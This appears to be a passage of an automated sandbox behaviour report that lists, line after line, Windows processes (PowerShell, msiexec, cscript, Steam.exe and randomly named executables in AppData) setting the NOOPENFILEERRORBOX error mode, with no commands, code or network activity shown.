                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\where.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\where.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
